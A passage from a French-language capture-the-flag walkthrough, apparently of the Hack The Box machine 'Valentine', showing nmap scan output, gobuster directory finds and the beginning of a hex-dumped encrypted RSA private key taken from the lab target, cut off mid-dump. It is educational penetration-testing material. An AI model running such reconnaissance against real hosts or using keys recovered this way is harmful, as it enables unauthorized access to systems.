</span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv 10.10.10.79 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1024</span> 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e <span class="o">(</span>DSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7P1IDtdRqun0pO9pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QDd1n16dSE2zeKKjYT9RVCXJqfYvz/ROm82p0JasEdg1z6QHTeAv70XX6cVQAjAMQoUUdF7WWKWjQuAknb4uowunpQ0yGvy72rbFkSTmlAAAAFQDwWVA5vTpfj5pUCUNFyvnhy3TdcQAAAIBFqVHk74mIT3PWKSpWcZvllKCGg5rGCCE5B3jRWEbRo8CPRkwyPdi/hSaoiQYhvCIkA2CWFuAeedsZE6zMFVFVSsHxeMe55aCQclfMH4iuUZWrg0y5QREuRbGFM6DATJJFkg+PXG/OsLsba/BP8UfcuPM+WGWKxjuaoJt6jeD8iQAAAIBg9rgf8NoRfGqzi+3ndUCo9/m+T18pn+ORbCKdFGq8Ecs4QLeaXPMRIpCol11n6va090EISDPetHcaMaMcYOsFqO841K0O90BV8DhyU4JYBjcpslT+A2X+ahj2QJVGqZJSlusNAQ9vplWxofFONa+IUSGl1UsGjY0QGsA5l5ohfQ<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI<span class="o">=</span> </span></span><span class="line"><span class="cl">80/tcp open http syn-ack Apache httpd 2.2.22 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.2.22 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="s1">&#39;t have a title (text/html). </span></span></span><span class="line"><span class="cl"><span class="s1">| http-methods: </span></span></span><span class="line"><span class="cl"><span class="s1">|_ Supported Methods: GET HEAD POST OPTIONS </span></span></span><span class="line"><span class="cl"><span class="s1">443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu)) </span></span></span><span class="line"><span class="cl"><span class="s1">|_ssl-date: 2025-02-09T12:49:15+00:00; +1s from scanner time. </span></span></span><span class="line"><span class="cl"><span class="s1">| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US </span></span></span><span class="line"><span class="cl"><span class="s1">| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US </span></span></span><span class="line"><span class="cl"><span class="s1">| Public Key type: rsa </span></span></span><span class="line"><span class="cl"><span class="s1">| Public Key bits: 2048 </span></span></span><span class="line"><span class="cl"><span class="s1">| Signature Algorithm: sha1WithRSAEncryption </span></span></span><span class="line"><span class="cl"><span class="s1">| Not valid before: 2018-02-06T00:45:25 </span></span></span><span class="line"><span class="cl"><span class="s1">| Not valid after: 2019-02-06T00:45:25 </span></span></span><span class="line"><span class="cl"><span class="s1">| MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d </span></span></span><span class="line"><span class="cl"><span class="s1">| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1 </span></span></span><span class="line"><span class="cl"><span class="s1">| -----BEGIN CERTIFICATE----- </span></span></span><span class="line"><span class="cl"><span class="s1">| MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV </span></span></span><span class="line"><span class="cl"><span class="s1">|_-----END CERTIFICATE----- </span></span></span><span class="line"><span class="cl"><span class="s1">| http-methods: </span></span></span><span class="line"><span class="cl"><span class="s1">|_ Supported Methods: GET HEAD POST OPTIONS </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-server-header: Apache/2.2.22 (Ubuntu) </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-title: Site doesn&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website-port-80">Website (port 80) </h3><p>On trouve un site internet sur le port <strong>80</strong> avec le nom de domaine suivant : <strong>valentine.htb</strong></p> <h3 id="gobuster">gobuster </h3><p>On trouve les dossiers/fichiers suivants:</p> <ul> <li>/dev</li> <li>/encode &lt;&ndash; permet d&rsquo;encoder en base 64</li> <li>/decode &lt;&ndash; decode le base64</li> <li>/dev/hype.key</li> <li>/dev/notes.txt &lt;&ndash; explique qu&rsquo;il y a des problemes de code dans encode/decode</li> </ul> <p>Le fichier hype.key est une clé privée RSA encodé en hexadecimal. Avec cyberchef on la récupère :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">2d 2d 2d 2d 2d <span class="m">42</span> <span class="m">45</span> <span class="m">47</span> <span class="m">49</span> 4e <span class="m">20</span> <span class="m">52</span> <span class="m">53</span> <span class="m">41</span> <span class="m">20</span> <span class="m">50</span> <span class="m">52</span> <span class="m">49</span> <span class="m">56</span> <span class="m">41</span> <span class="m">54</span> <span class="m">45</span> <span class="m">20</span> 4b <span class="m">45</span> <span class="m">59</span> 2d 2d 2d 2d 2d 0d 0a <span class="m">50</span> <span class="m">72</span> 6f <span class="m">63</span> 2d <span class="m">54</span> <span class="m">79</span> <span class="m">70</span> <span class="m">65</span> 3a <span class="m">20</span> <span class="m">34</span> 2c <span class="m">45</span> 4e <span class="m">43</span> <span class="m">52</span> <span class="m">59</span> <span class="m">50</span> <span class="m">54</span> <span class="m">45</span> <span class="m">44</span> 0d 0a <span class="m">44</span> <span class="m">45</span> 4b 2d <span class="m">49</span> 6e <span class="m">66</span> 6f 3a <span class="m">20</span> <span class="m">41</span> <span class="m">45</span> <span class="m">53</span> 2d <span class="m">31</span> <span class="m">32</span> <span class="m">38</span> 2d <span class="m">43</span> <span class="m">42</span> <span class="m">43</span> 2c <span class="m">41</span> <span class="m">45</span> <span class="m">42</span> <span class="m">38</span> <span class="m">38</span> <span class="m">43</span> <span class="m">31</span> <span class="m">34</span> <span class="m">30</span> <span class="m">46</span> <span class="m">36</span> <span class="m">39</span> <span class="m">42</span> <span class="m">46</span> <span class="m">32</span> <span class="m">30</span> <span class="m">37</span> <span class="m">34</span> <span class="m">37</span> <span class="m">38</span> <span class="m">38</span> <span class="m">44</span> <span class="m">45</span> <span class="m">32</span> <span class="m">34</span> <span class="m">41</span> <span class="m">45</span> <span class="m">34</span> <span class="m">38</span> <span class="m">44</span> <span class="m">34</span> <span class="m">36</span> 0d 0a 0d 0a <span class="m">44</span> <span class="m">62</span> <span class="m">50</span> <span class="m">72</span> 4f <span class="m">37</span> <span class="m">38</span> 6b <span class="m">65</span> <span class="m">67</span> 4e <span class="m">75</span> 6b <span class="m">31</span> <span class="m">44</span> <span class="m">41</span> <span class="m">71</span> 6c <span class="m">41</span> 4e <span class="m">35</span> 6a <span class="m">62</span> 6a <span class="m">58</span> <span class="m">76</span> <span class="m">30</span> <span class="m">50</span> <span class="m">50</span> <span class="m">73</span> 6f <span class="m">67</span> <span class="m">33</span> 6a <span class="m">64</span> <span class="m">62</span> 4d <span class="m">46</span> <span class="m">53</span> <span class="m">38</span> <span class="m">69</span> <span class="m">45</span> <span class="m">39</span> <span class="m">70</span> <span class="m">33</span> <span class="m">55</span> 4f 4c <span class="m">30</span> 6c <span class="m">46</span> <span class="m">30</span> <span class="m">78</span> <span class="m">66</span> <span class="m">37</span> <span class="m">50</span> 7a 6d <span class="m">72</span> 6b <span class="m">44</span> <span class="m">61</span> <span class="m">38</span> <span class="m">52</span> 0d 0a <span class="m">35</span> <span class="m">79</span> 2f <span class="m">62</span> <span class="m">34</span> <span class="m">36</span> 2b <span class="m">39</span> 6e <span class="m">45</span> <span class="m">70</span> <span class="m">43</span> 4d <span class="m">66</span> <span class="m">54</span> <span class="m">50</span> <span class="m">68</span> 4e <span class="m">75</span> 4a <span class="m">52</span> <span class="m">63</span> <span class="m">57</span> <span class="m">32</span> <span class="m">55</span> <span class="m">32</span> <span class="m">67</span> 4a <span class="m">63</span> 4f <span class="m">46</span> <span class="m">48</span> 2b <span class="m">39</span> <span class="m">52</span> 4a <span class="m">44</span> <span class="m">42</span> <span class="m">43</span> <span class="m">35</span> <span class="m">55</span> 4a 4d <span class="m">55</span> <span class="m">53</span> <span class="m">31</span> 2f <span class="m">67</span> 6a <span class="m">42</span> 2f <span class="m">37</span> 2f 4d <span class="m">79</span> <span class="m">30</span> <span class="m">30</span> 4d <span class="m">77</span> <span class="m">78</span> 2b <span class="m">61</span> <span class="m">49</span> <span class="m">36</span> 0d 0a <span class="m">30</span> <span class="m">45</span> <span class="m">49</span> <span class="m">30</span> <span class="m">53</span> <span class="m">62</span> 4f <span class="m">59</span> <span class="m">55</span> <span class="m">41</span> <span class="m">56</span> <span class="m">31</span> <span class="m">57</span> <span class="m">34</span> <span class="m">45</span> <span class="m">56</span> <span class="m">37</span> 6d <span class="m">39</span> <span class="m">36</span> <span class="m">51</span> <span class="m">73</span> 5a 6a <span class="m">72</span> <span class="m">77</span> 4a <span class="m">76</span> 6e 6a <span class="m">56</span> <span class="m">61</span> <span class="m">66</span> 6d <span class="m">36</span> <span class="m">56</span> <span class="m">73</span> 4b <span class="m">61</span> <span class="m">54</span> <span class="m">50</span> <span class="m">42</span> <span class="m">48</span> <span class="m">70</span> <span class="m">75</span> <span class="m">67</span> <span class="m">63</span> <span class="m">41</span> <span class="m">53</span> <span class="m">76</span> 4d <span class="m">71</span> 7a <span class="m">37</span> <span class="m">36</span> <span class="m">57</span> <span class="m">36</span> <span class="m">61</span> <span class="m">62</span> <span class="m">52</span> 5a <span class="m">65</span> <span class="m">58</span> <span class="m">69</span> 0d 0a <span class="m">45</span> <span class="m">62</span> <span class="m">77</span> <span class="m">36</span> <span class="m">36</span> <span class="m">68</span> 6a <span class="m">46</span> 6d <span class="m">41</span> <span class="m">75</span> <span class="m">34</span> <span class="m">41</span> 7a <span class="m">71</span> <span class="m">63</span> 4d 2f 6b <span class="m">69</span> <span class="m">67</span> 4e <span class="m">52</span> <span class="m">46</span> <span class="m">50</span> <span class="m">59</span> <span class="m">75</span> 4e <span class="m">69</span> <span class="m">58</span> <span class="m">72</span> <span class="m">58</span> <span class="m">73</span> <span class="m">31</span> <span class="m">77</span> 2f <span class="m">64</span> <span class="m">65</span> 4c <span class="m">43</span> <span class="m">71</span> <span class="m">43</span> 4a 2b <span class="m">45</span> <span class="m">61</span> <span class="m">31</span> <span class="m">54</span> <span class="m">38</span> 7a 6c <span class="m">61</span> <span class="m">73</span> <span class="m">36</span> <span class="m">66</span> <span class="m">63</span> 6d <span class="m">68</span> 4d <span class="m">38</span> <span class="m">41</span> 2b <span class="m">38</span> <span class="m">50</span> 0d 0a 4f <span class="m">58</span> <span class="m">42</span> 4b 4e <span class="m">65</span> <span class="m">36</span> 6c <span class="m">31</span> <span class="m">37</span> <span class="m">68</span> 4b <span class="m">61</span> <span class="m">54</span> <span class="m">36</span> <span class="m">77</span> <span class="m">46</span> 6e <span class="m">70</span> <span class="m">35</span> <span class="m">65</span> <span class="m">58</span> 4f <span class="m">61</span> <span class="m">55</span> <span class="m">49</span> <span class="m">48</span> <span class="m">76</span> <span class="m">48</span> 6e <span class="m">76</span> 4f <span class="m">36</span> <span class="m">53</span> <span class="m">63</span> <span class="m">48</span> <span class="m">56</span> <span class="m">57</span> <span class="m">52</span> <span class="m">72</span> 5a <span class="m">37</span> <span class="m">30</span> <span class="m">66</span> <span class="m">63</span> <span class="m">70</span> <span class="m">63</span> <span class="m">70</span> <span class="m">69</span> 6d 4c <span class="m">31</span> <span class="m">77</span> <span class="m">31</span> <span class="m">33</span> <span class="m">54</span> <span class="m">67</span> <span class="m">64</span> <span class="m">64</span> <span class="m">32</span> <span class="m">41</span> <span class="m">69</span> <span class="m">47</span> <span class="m">64</span> 0d 0a <span class="m">70</span> <span class="m">48</span> 4c 4a <span class="m">70</span> <span class="m">59</span> <span class="m">55</span> <span class="m">49</span> <span class="m">49</span> <span class="m">35</span> <span class="m">50</span> <span class="m">75</span> 4f <span class="m">36</span> <span class="m">78</span> 2b 4c <span class="m">53</span> <span class="m">38</span> 6e <span class="m">31</span> <span class="m">72</span> 2f <span class="m">47</span> <span class="m">57</span> 4d <span class="m">71</span> <span class="m">53</span> 4f <span class="m">45</span> <span class="m">69</span> 6d 4e <span class="m">52</span> <span class="m">44</span> <span class="m">31</span> 6a 2f <span class="m">35</span> <span class="m">39</span> 2f <span class="m">34</span> <span class="m">75</span> <span class="m">33</span> <span class="m">52</span> 4f <span class="m">72</span> <span class="m">54</span> <span class="m">43</span> 4b <span class="m">65</span> 6f <span class="m">39</span> <span class="m">44</span> <span class="m">73</span> <span class="m">54</span> <span class="m">52</span> <span class="m">71</span> <span class="m">73</span> <span class="m">32</span> 6b <span class="m">31</span> <span class="m">53</span> <span class="m">48</span> 0d 0a <span class="m">51</span> <span class="m">64</span> <span class="m">57</span> <span class="m">77</span> <span class="m">46</span> <span class="m">77</span> <span class="m">61</span> <span class="m">58</span> <span class="m">62</span> <span class="m">59</span> <span class="m">79</span> <span class="m">54</span> <span class="m">31</span> <span class="m">75</span> <span class="m">78</span> <span class="m">41</span> 4d <span class="m">53</span> 6c <span class="m">35</span> <span class="m">48</span> <span class="m">71</span> <span class="m">39</span> 4f <span class="m">44</span> <span class="m">35</span> <span class="m">48</span> 4a <span class="m">38</span> <span class="m">47</span> <span class="m">30</span> <span class="m">52</span> <span class="m">36</span> 4a <span class="m">49</span> <span class="m">35</span> <span class="m">52</span> <span class="m">76</span> <span class="m">43</span> 4e <span class="m">55</span> <span class="m">51</span> 6a <span class="m">77</span> <span class="m">78</span> <span class="m">30</span> <span class="m">46</span> <span class="m">49</span> <span class="m">54</span> 6a 6a 4d 6a 6e 4c <span class="m">49</span> <span class="m">70</span> <span class="m">78</span> 6a <span class="m">76</span> <span class="m">66</span> <span class="m">71</span> 2b <span class="m">45</span> 0d 0a <span class="m">70</span> <span class="m">30</span> <span class="m">67</span> <span class="m">44</span> <span class="m">30</span> <span class="m">55</span> <span class="m">63</span> <span class="m">79</span> 6c 4b 6d <span class="m">36</span> <span class="m">72</span> <span class="m">43</span> 5a <span class="m">71</span> <span class="m">61</span> <span class="m">63</span> <span class="m">77</span> 6e <span class="m">53</span> <span class="m">64</span> <span class="m">64</span> <span class="m">48</span> <span class="m">57</span> <span class="m">38</span> <span class="m">57</span> <span class="m">33</span> 4c <span class="m">78</span> 4a 6d <span class="m">43</span> <span class="m">78</span> <span class="m">64</span> <span class="m">78</span> <span class="m">57</span> <span class="m">35</span> 6c <span class="m">74</span> <span class="m">35</span> <span class="m">64</span> <span class="m">50</span> 6a <span class="m">41</span> 6b <span class="m">42</span> <span class="m">59</span> <span class="m">52</span> <span class="m">55</span> 6e 6c <span class="m">39</span> <span class="m">31</span> <span class="m">45</span> <span class="m">53</span> <span class="m">43</span> <span class="m">69</span> <span class="m">44</span> <span class="m">34</span> 5a 2b <span class="m">75</span> <span class="m">43</span> 0d 0a 4f 6c <span class="m">36</span> 6a 4c <span class="m">46</span> <span class="m">44</span> <span class="m">32</span> 6b <span class="m">61</span> 4f 4c <span class="m">66</span> <span class="m">75</span> <span class="m">79</span> <span class="m">65</span> <span class="m">65</span> <span class="m">30</span> <span class="m">66</span> <span class="m">59</span> <span class="m">43</span> <span class="m">62</span> <span class="m">37</span> <span class="m">47</span> <span class="m">54</span> <span class="m">71</span> 4f <span class="m">65</span> <span class="m">37</span> <span class="m">45</span> 6d 4d <span class="m">42</span> <span class="m">33</span> <span class="m">66</span> <span class="m">47</span> <span class="m">49</span> <span class="m">77</span> <span class="m">53</span> <span class="m">64</span> <span class="m">57</span> <span class="m">38</span> 4f <span class="m">43</span> <span class="m">38</span> 4e <span class="m">57</span> <span class="m">54</span> 6b <span class="m">77</span> <span class="m">70</span> 6a <span class="m">63</span> <span class="m">30</span> <span class="m">45</span> 4c <span class="m">62</span> 6c <span class="m">55</span> <span class="m">61</span> <span class="m">36</span> <span class="m">75</span> 6c 4f 0d 0a <span class="m">74</span> <span class="m">39</span> <span class="m">67</span> <span class="m">72</span> <span class="m">53</span> 6f <span class="m">73</span> <span class="m">52</span> <span class="m">54</span> <span class="m">43</span> <span class="m">73</span> 5a <span class="m">64</span> <span class="m">31</span> <span class="m">34</span> 4f <span class="m">50</span> <span class="m">74</span> <span class="m">73</span> <span class="m">34</span> <span class="m">62</span> 4c <span class="m">73</span> <span class="m">70</span> 4b <span class="m">78</span> 4d 4d 4f <span class="m">73</span> <span class="m">67</span> 6e 4b 6c 6f <span class="m">58</span> <span class="m">76</span> 6e 6c <span class="m">50</span> 4f <span class="m">53</span> <span class="m">77</span> <span class="m">53</span> <span class="m">70</span> <span class="m">57</span> <span class="m">79</span> <span class="m">39</span> <span class="m">57</span> <span class="m">70</span> <span class="m">36</span> <span class="m">79</span> <span class="m">38</span> <span class="m">58</span> <span class="m">58</span> <span class="m">38</span> 2b <span class="m">46</span> <span class="m">34</span> <span class="m">30</span> <span class="m">72</span> <span class="m">78</span> 6c <span class="m">35</span> 0d 0a <span class="m">58</span> <span class="m">71</span> <span class="m">68</span> <span class="m">44</span> <span class="m">55</span> <span class="m">42</span> <span class="m">68</span> <span class="m">79</span> 6b <span class="m">31</span> <span class="m">43</span> <span class="m">33</span> <span class="m">59</span> <span class="m">50</span> 4f <span class="m">69</span> <span class="m">44</span> <span class="m">75</span> <span class="m">50</span> 4f 6e 4d <span class="m">58</span> <span class="m">61</span> <span class="m">49</span> <span class="m">70</span> <span class="m">65</span> <span class="m">31</span> <span class="m">64</span> <span class="m">67</span> <span class="m">62</span> <span class="m">30</span> 4e <span class="m">64</span> <span class="m">44</span> <span class="m">31</span> 4d <span class="m">39</span> 5a <span class="m">51</span> <span class="m">53</span> 4e <span class="m">55</span> 4c <span class="m">77</span> <span class="m">31</span> <span class="m">44</span> <span class="m">48</span> <span class="m">43</span> <span class="m">47</span> <span class="m">50</span> <span class="m">50</span> <span class="m">34</span> 4a <span class="m">53</span> <span class="m">53</span> <span class="m">78</span> <span class="m">58</span> <span class="m">37</span> <span class="m">42</span> <span class="m">57</span> <span class="m">64</span> <span class="m">44</span> 4b 0d 0a <span class="m">61</span> <span class="m">41</span> 6e <span class="m">57</span> 4a <span class="m">76</span> <span class="m">46</span> <span class="m">67</span> 6c <span class="m">41</span> <span class="m">34</span> 6f <span class="m">46</span> <span class="m">42</span> <span class="m">42</span> <span class="m">56</span> <span class="m">41</span> <span class="m">38</span> <span class="m">75</span> <span class="m">41</span> <span class="m">50</span> 4d <span class="m">66</span> <span class="m">56</span> <span class="m">32</span> <span class="m">58</span> <span class="m">46</span> <span class="m">51</span> 6e 6a <span class="m">77</span> <span class="m">55</span> <span class="m">54</span> <span class="m">35</span> <span class="m">62</span> <span class="m">50</span> 4c <span class="m">43</span> <span class="m">36</span> <span class="m">35</span> <span class="m">74</span> <span class="m">46</span> <span class="m">73</span> <span class="m">74</span> 6f <span class="m">52</span> <span class="m">74</span> <span class="m">54</span> 5a <span class="m">31</span> <span class="m">75</span> <span class="m">53</span> <span class="m">72</span> <span class="m">75</span> <span class="m">61</span> <span class="m">69</span> <span class="m">32</span> <span class="m">37</span> 6b <span class="m">78</span> <span class="m">54</span> 6e 4c <span class="m">51</span> 0d 0a 2b <span class="m">77</span> <span class="m">51</span> <span class="m">38</span> <span class="m">37</span> 6c 4d <span class="m">61</span> <span class="m">64</span> <span class="m">64</span> <span class="m">73</span> <span class="m">31</span> <span class="m">47</span> <span class="m">51</span> 4e <span class="m">65</span> <span class="m">47</span> <span class="m">73</span> 4b <span class="m">53</span> <span class="m">66</span> <span class="m">38</span> <span class="m">52</span> 2f <span class="m">72</span> <span class="m">73</span> <span class="m">52</span> 4b <span class="m">65</span> <span class="m">65</span> 4b <span class="m">63</span> <span class="m">69</span> 6c <span class="m">44</span> <span class="m">65</span> <span class="m">50</span> <span class="m">43</span> 6a <span class="m">65</span> <span class="m">61</span> 4c <span class="m">71</span> <span class="m">74</span> <span class="m">71</span> <span class="m">78</span> 6e <span class="m">68</span> 4e 6f <span class="m">46</span> <span class="m">74</span> <span class="m">67</span> <span class="m">30</span> 4d <span class="m">78</span> <span class="m">74</span> <span class="m">36</span> <span class="m">72</span> <span class="m">32</span> <span class="m">67</span> <span class="m">62</span> <span class="m">31</span> <span class="m">45</span> 0d 0a <span class="m">41</span> 6c 6f <span class="m">51</span> <span class="m">36</span> 6a <span class="m">67</span> <span class="m">35</span> <span class="m">54</span> <span class="m">62</span> 6a <span class="m">35</span> 4a <span class="m">37</span> <span class="m">71</span> <span class="m">75</span> <span class="m">59</span> <span class="m">58</span> 5a <span class="m">50</span> <span class="m">79</span> 6c <span class="m">42</span> 6c 6a 4e <span class="m">70</span> <span class="m">39</span> <span class="m">47</span> <span class="m">56</span> <span class="m">70</span> <span class="m">69</span> 6e <span class="m">50</span> <span class="m">63</span> <span class="m">33</span> 4b <span class="m">70</span> <span class="m">48</span> <span class="m">74</span> <span class="m">74</span> <span class="m">76</span> <span class="m">67</span> <span class="m">62</span> <span class="m">70</span> <span class="m">74</span> <span class="m">66</span> <span class="m">69</span> <span class="m">57</span> <span class="m">45</span> <span class="m">45</span> <span class="m">73</span> 5a <span class="m">59</span> 6e <span class="m">35</span> <span class="m">79</span> 5a <span class="m">50</span> <span class="m">68</span> <span class="m">55</span> <span class="m">72</span> <span class="m">39</span> <span class="m">51</span> 0d 0a <span class="m">72</span> <span class="m">30</span> <span class="m">38</span> <span class="m">70</span> 6b 4f <span class="m">78</span> <span class="m">41</span> <span class="m">72</span> <span class="m">58</span> <span class="m">45</span> <span class="m">32</span> <span class="m">64</span> 6a <span class="m">37</span> <span class="m">65</span> <span class="m">58</span> 2b <span class="m">62</span> <span class="m">71</span> <span class="m">36</span> <span class="m">35</span> <span class="m">36</span> <span class="m">33</span> <span class="m">35</span> 4f 4a <span class="m">36</span> <span class="m">54</span> <span class="m">71</span> <span class="m">48</span> <span class="m">62</span> <span class="m">41</span> 6c <span class="m">54</span> <span class="m">51</span> <span class="m">31</span> <span class="m">52</span> <span class="m">73</span> <span class="m">39</span> <span class="m">50</span> <span class="m">75</span> 6c <span class="m">72</span> <span class="m">53</span> <span class="m">37</span> 4b <span class="m">34</span> <span class="m">53</span> 4c <span class="m">58</span> <span class="m">37</span> 6e <span class="m">59</span> <span class="m">38</span> <span class="m">39</span> 2f <span class="m">52</span> 5a <span class="m">35</span> 6f <span class="m">53</span> <span class="m">51</span> <span class="m">65</span> 0d 0a <span class="m">32</span> <span class="m">56</span> <span class="m">57</span> <span class="m">52</span> <span class="m">79</span> <span class="m">54</span> 5a <span class="m">31</span> <span class="m">46</span> <span class="m">66</span> 6e <span class="m">67</span> 4a <span class="m">53</span> <span class="m">73</span> <span class="m">76</span> <span class="m">39</span> 2b 4d <span class="m">66</span> <span class="m">76</span> 7a <span class="m">33</span> <span class="m">34</span> <span class="m">31</span> 6c <span class="m">62</span> 7a 4f <span class="m">49</span> <span class="m">57</span> 6d 6b <span class="m">37</span> <span class="m">57</span> <span class="m">66</span> <span class="m">45</span> <span class="m">63</span> <span class="m">57</span> <span class="m">63</span> <span class="m">48</span> <span class="m">63</span> <span class="m">31</span> <span class="m">36</span> 6e <span class="m">39</span> <span class="m">56</span> <span class="m">30</span> <span class="m">49</span> <span class="m">62</span> <span class="m">53</span> 4e <span class="m">41</span> 4c 6e 6a <span class="m">54</span> <span class="m">68</span> <span class="m">76</span> <span class="m">45</span> <span class="m">63</span> <span class="m">50</span> 6b <span class="m">79</span> 0d 0a <span class="m">65</span> <span class="m">31</span> <span class="m">42</span> <span class="m">73</span> <span class="m">66</span> <span class="m">53</span> <span class="m">62</span> <span class="m">73</span> <span class="m">66</span> <span class="m">39</span> <span class="m">46</span> <span class="m">67</span> <span class="m">75</span> <span class="m">55</span> 5a 6b <span class="m">67</span> <span class="m">48</span> <span class="m">41</span> 6e 6e <span class="m">66</span> <span class="m">52</span> 4b 6b <span class="m">47</span> <span class="m">56</span> <span class="m">47</span> <span class="m">31</span> 4f <span class="m">56</span> <span class="m">79</span> <span class="m">75</span> <span class="m">77</span> <span class="m">63</span> 2f 4c <span class="m">56</span> 6a 6d <span class="m">62</span> <span class="m">68</span> 5a 7a 4b <span class="m">77</span> 4c <span class="m">68</span> <span class="m">61</span> 5a <span class="m">52</span> 4e <span class="m">64</span> <span class="m">38</span> <span class="m">48</span> <span class="m">45</span> 4d <span class="m">38</span> <span class="m">36</span> <span class="m">66</span> 4e 6f 6a <span class="m">50</span> 0d 0a <span class="m">30</span> <span class="m">39</span> 6e <span class="m">56</span> 6a <span class="m">54</span> <span class="m">61</span> <span class="m">59</span> <span class="m">74</span> <span class="m">57</span> <span class="m">55</span> <span class="m">58</span> 6b <span class="m">30</span> <span class="m">53</span> <span class="m">69</span> <span class="m">31</span> <span class="m">57</span> <span class="m">30</span> <span class="m">32</span> <span class="m">77</span> <span class="m">62</span> <span class="m">75</span> <span class="m">31</span> 4e 7a 4c 2b <span class="m">31</span> <span class="m">54</span> <span class="m">67</span> <span class="m">39</span> <span class="m">49</span> <span class="m">70</span> 4e <span class="m">79</span> <span class="m">49</span> <span class="m">53</span> <span class="m">46</span> <span class="m">43</span> <span class="m">46</span> <span class="m">59</span> 6a <span class="m">53</span> <span class="m">71</span> <span class="m">69</span> <span class="m">79</span> <span class="m">47</span> 2b <span class="m">57</span> <span class="m">55</span> <span class="m">37</span> <span class="m">49</span> <span class="m">77</span> 4b <span class="m">33</span> <span class="m">59</span> <span class="m">55</span> <span class="m">35</span> 6b <span class="m">70</span> <span class="m">33</span> <span class="m">43</span> <span class="m">43</span> 0d 0a <span class="m">64</span> <span class="m">59</span> <span class="m">53</span> <span class="m">63</span> 7a <span class="m">36</span> <span class="m">33</span> <span class="m">51</span> <span class="m">32</span> <span class="m">70</span> <span class="m">51</span> <span class="m">61</span> <span class="m">66</span> <span class="m">78</span> <span class="m">66</span> <span class="m">53</span> <span class="m">62</span> <span class="m">75</span> <span class="m">76</span> <span class="m">34</span> <span class="m">43</span> 4d 6e 4e <span class="m">70</span> <span class="m">64</span> <span class="m">69</span> <span class="m">72</span> <span class="m">56</span> 4b <span class="m">45</span> 6f <span class="m">35</span> 6e <span class="m">52</span> <span class="m">52</span> <span class="m">66</span> 4b 2f <span class="m">69</span> <span class="m">61</span> 4c <span class="m">33</span> <span class="m">58</span> <span class="m">31</span> <span class="m">52</span> <span class="m">33</span> <span class="m">44</span> <span class="m">78</span> <span class="m">56</span> <span class="m">38</span> <span class="m">65</span> <span class="m">53</span> <span class="m">59</span> <span 